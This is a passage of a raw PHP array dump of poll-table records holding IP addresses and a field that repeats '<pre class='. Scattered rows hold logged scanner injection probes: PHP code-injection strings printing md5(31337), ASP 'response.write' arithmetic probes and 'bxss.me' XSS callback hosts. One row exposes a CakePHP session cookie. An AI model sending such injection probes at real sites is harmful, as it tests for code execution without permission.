'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2362 => array(
'id' => '2905',
'ip' => '194.34.233.95',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 2363 => array(
'id' => '2906',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2364 => array(
'id' => '2907',
'ip' => 'http:bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2365 => array(
'id' => '2908',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2366 => array(
'id' => '2909',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2367 => array(
'id' => '2910',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2368 => array(
'id' => '2911',
'ip' => '194.34.233.95',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 2369 => array(
'id' => '2912',
'ip' => 'http:bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2370 => array(
'id' => '2913',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2371 => array(
'id' => '2914',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2372 => array(
'id' => '2915',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2373 => array(
'id' => '2916',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2374 => array(
'id' => '2917',
'ip' => 'http:bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2375 => array(
'id' => '2918',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2376 => array(
'id' => '2919',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2377 => array(
'id' => '2920',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2378 => array(
'id' => '2921',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2379 => array(
'id' => '2922',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2380 => array(
'id' => '2923',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2381 => array(
'id' => '2924',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2382 => array(
'id' => '2925',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2383 => array(
'id' => '2926',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2384 => array(
'id' => '2927',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2385 => array(
'id' => '2928',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2386 => array(
'id' => '2929',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2387 => array(
'id' => '2930',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2388 => array(
'id' => '2931',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2389 => array(
'id' => '2932',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2390 => array(
'id' => '2933',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2391 => array(
'id' => '2934',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2392 => array(
'id' => '2935',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2393 => array(
'id' => '2936',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2394 => array(
'id' => '2937',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2395 => array(
'id' => '2938',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 2396 => array(
'id' => '2939',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 2397 => array(
'id' => '2940',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 2398 => array(
'id' => '2941',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 2399 => array(
'id' => '2942',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 2400 => array(
'id' => '2943',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 2401 => array(
'id' => '2944',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2402 => array(
'id' => '2945',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2403 => array(
'id' => '2946',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2404 => array(
'id' => '2947',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2405 => array(
'id' => '2948',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2406 => array(
'id' => '2949',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2407 => array(
'id' => '2950',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2408 => array(
'id' => '2951',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2409 => array(
'id' => '2952',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2410 => array(
'id' => '2953',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2411 => array(
'id' => '2954',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2412 => array(
'id' => '2955',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2413 => array(
'id' => '2956',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2414 => array(
'id' => '2957',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2415 => array(
'id' => '2958',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2416 => array(
'id' => '2959',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2417 => array(
'id' => '2960',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2418 => array(
'id' => '2961',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2419 => array(
'id' => '2962',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2420 => array(
'id' => '2963',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2421 => array(
'id' => '2964',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2422 => array(
'id' => '2965',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2423 => array(
'id' => '2966',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2424 => array(
'id' => '2967',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2425 => array(
'id' => '2968',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2426 => array(
'id' => '2969',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2427 => array(
'id' => '2970',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2428 => array(
'id' => '2971',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2429 => array(
'id' => '2972',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2430 => array(
'id' => '2973',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2431 => array(
'id' => '2974',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2432 => array(
'id' => '2975',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2433 => array(
'id' => '2976',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2434 => array(
'id' => '2977',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2435 => array(
'id' => '2978',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2436 => array(
'id' => '2979',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2437 => array(
'id' => '2980',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2438 => array(
'id' => '2981',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2439 => array(
'id' => '2982',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2440 => array(
'id' => '2983',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2441 => array(
'id' => '2984',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2442 => array(
'id' => '2985',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2443 => array(
'id' => '2986',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2444 => array(
'id' => '2987',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2445 => array(
'id' => '2988',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2446 => array(
'id' => '2989',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2447 => array(
'id' => '2990',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2448 => array(
'id' => '2991',
'ip' => '1BMvl9snO',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2449 => array(
'id' => '2992',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2450 => array(
'id' => '2993',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2451 => array(
'id' => '2994',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2452 => array(
'id' => '2995',
'ip' => '45.137.76.29',
'ip1' => '1RazesNNO',
'sondage_id' => '2'
),
(int) 2453 => array(
'id' => '2996',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2454 => array(
'id' => '2997',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2455 => array(
'id' => '2998',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2456 => array(
'id' => '2999',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2457 => array(
'id' => '3000',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2458 => array(
'id' => '3001',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2459 => array(
'id' => '3002',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2460 => array(
'id' => '3003',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2461 => array(
'id' => '3004',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2462 => array(
'id' => '3005',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2463 => array(
'id' => '3006',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2464 => array(
'id' => '3007',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2465 => array(
'id' => '3008',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2466 => array(
'id' => '3009',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2467 => array(
'id' => '3010',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2468 => array(
'id' => '3011',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2469 => array(
'id' => '3012',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2470 => array(
'id' => '3013',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2471 => array(
'id' => '3014',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2472 => array(
'id' => '3015',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2473 => array(
'id' => '3016',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2474 => array(
'id' => '3017',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2475 => array(
'id' => '3018',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2476 => array(
'id' => '3019',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2477 => array(
'id' => '3020',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2478 => array(
'id' => '3021',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2479 => array(
'id' => '3022',
'ip' => 'ioJOX83U',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2480 => array(
'id' => '3023',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2481 => array(
'id' => '3024',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2482 => array(
'id' => '3025',
'ip' => 'lsN1cfb1: DHgPlUyH',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2483 => array(
'id' => '3026',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2484 => array(
'id' => '3027',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2485 => array(
'id' => '3028',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2486 => array(
'id' => '3029',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2487 => array(
'id' => '3030',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2488 => array(
'id' => '3031',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2489 => array(
'id' => '3032',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2490 => array(
'id' => '3033',
'ip' => '45.137.76.29',
'ip1' => 'rQKR5dEs',
'sondage_id' => '2'
),
(int) 2491 => array(
'id' => '3034',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2492 => array(
'id' => '3035',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2493 => array(
'id' => '3036',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2494 => array(
'id' => '3037',
'ip' => '45.137.76.29',
'ip1' => 'nuiBf3H1: ncyeAcgp',
'sondage_id' => '2'
),
(int) 2495 => array(
'id' => '3038',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2496 => array(
'id' => '3039',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2497 => array(
'id' => '3040',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2498 => array(
'id' => '3041',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2499 => array(
'id' => '3042',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2500 => array(
'id' => '3043',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2501 => array(
'id' => '3044',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2502 => array(
'id' => '3045',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2503 => array(
'id' => '3046',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2504 => array(
'id' => '3047',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2505 => array(
'id' => '3048',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2506 => array(
'id' => '3049',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2507 => array(
'id' => '3050',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2508 => array(
'id' => '3051',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2509 => array(
'id' => '3052',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2510 => array(
'id' => '3053',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2511 => array(
'id' => '3054',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2512 => array(
'id' => '3055',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2513 => array(
'id' => '3056',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2514 => array(
'id' => '3057',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2515 => array(
'id' => '3058',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2516 => array(
'id' => '3059',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2517 => array(
'id' => '3060',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2518 => array(
'id' => '3061',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2519 => array(
'id' => '3062',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2520 => array(
'id' => '3063',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2521 => array(
'id' => '3064',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2522 => array(
'id' => '3065',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2523 => array(
'id' => '3066',
'ip' => '45.137.76.29',
'ip1' => 'response.write(9359119*9052169)',
'sondage_id' => '2'
),
(int) 2524 => array(
'id' => '3067',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2525 => array(
'id' => '3068',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2526 => array(
'id' => '3069',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2527 => array(
'id' => '3070',
'ip' => '45.137.76.29',
'ip1' => ''+response.write(9359119*9052169)+'',
'sondage_id' => '2'
),
(int) 2528 => array(
'id' => '3071',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2529 => array(
'id' => '3072',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2530 => array(
'id' => '3073',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2531 => array(
'id' => '3074',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2532 => array(
'id' => '3075',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2533 => array(
'id' => '3076',
'ip' => '45.137.76.29',
'ip1' => '"+response.write(9359119*9052169)+"',
'sondage_id' => '2'
),
(int) 2534 => array(
'id' => '3077',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2535 => array(
'id' => '3078',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2536 => array(
'id' => '3079',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2537 => array(
'id' => '3080',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2538 => array(
'id' => '3081',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2539 => array(
'id' => '3082',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2540 => array(
'id' => '3083',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2541 => array(
'id' => '3084',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2542 => array(
'id' => '3085',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2543 => array(
'id' => '3086',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2544 => array(
'id' => '3087',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2545 => array(
'id' => '3088',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2546 => array(
'id' => '3089',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2547 => array(
'id' => '3090',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2548 => array(
'id' => '3091',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2549 => array(
'id' => '3092',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2550 => array(
'id' => '3093',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2551 => array(
'id' => '3094',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2552 => array(
'id' => '3095',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2553 => array(
'id' => '3096',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2554 => array(
'id' => '3097',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2555 => array(
'id' => '3098',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2556 => array(
'id' => '3099',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2557 => array(
'id' => '3100',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2558 => array(
'id' => '3101',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2559 => array(
'id' => '3102',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2560 => array(
'id' => '3103',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2561 => array(
'id' => '3104',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2562 => array(
'id' => '3105',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2563 => array(
'id' => '3106',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2564 => array(
'id' => '3107',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2565 => array(
'id' => '3108',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2566 => array(
'id' => '3109',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2567 => array(
'id' => '3110',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2568 => array(
'id' => '3111',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2569 => array(
'id' => '3112',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2570 => array(
'id' => '3113',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2571 => array(
'id' => '3114',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2572 => array(
'id' => '3115',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2573 => array(
'id' => '3116',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2574 => array(
'id' => '3117',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2575 => array(
'id' => '3118',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2576 => array(
'id' => '3119',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2577 => array(
'id' => '3120',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2578 => array(
'id' => '3121',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2579 => array(
'id' => '3122',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2580 => array(
'id' => '3123',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2581 => array(
'id' => '3124',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2582 => array(
'id' => '3125',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2583 => array(
'id' => '3126',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2584 => array(
'id' => '3127',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2585 => array(
'id' => '3128',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2586 => array(
'id' => '3129',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2587 => array(
'id' => '3130',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2588 => array(
'id' => '3131',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2589 => array(
'id' => '3132',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2590 => array(
'id' => '3133',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2591 => array(
'id' => '3134',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2592 => array(
'id' => '3135',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2593 => array(
'id' => '3136',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2594 => array(
'id' => '3137',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2595 => array(
'id' => '3138',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
